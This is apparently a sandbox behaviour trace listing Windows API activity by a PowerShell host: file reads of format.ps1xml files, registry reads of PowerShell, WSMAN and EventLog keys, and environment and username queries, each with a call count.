| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096 |
|
5 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4018 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 78, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096 |
|
17 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 3022 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 50, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 281 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096 |
|
38 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | type = file_type |
|
1 | |
| File | Read | size = 4096, size_out = 4096 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | type = file_type |
|
1 | |
| File | Read | size = 4096, size_out = 4096 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | type = file_type |
|
1 | |
| File | Read | size = 4096, size_out = 4096 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
7 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| User | Get Username | user_name_out = aETAdzjz |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| User | Get Username | user_name_out = aETAdzjz |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| User | Get Username | user_name_out = aETAdzjz |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HOMEPATH, result_out = \Users\aETAdzjz |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
4 | |
| User | Get Username | user_name_out = aETAdzjz |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| User | Get Username | user_name_out = aETAdzjz |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| User | Get Username | user_name_out = aETAdzjz |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| User | Get Username | user_name_out = aETAdzjz |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
5 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Windows, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Windows, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
3 | |
| User | Get Username | user_name_out = aETAdzjz |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
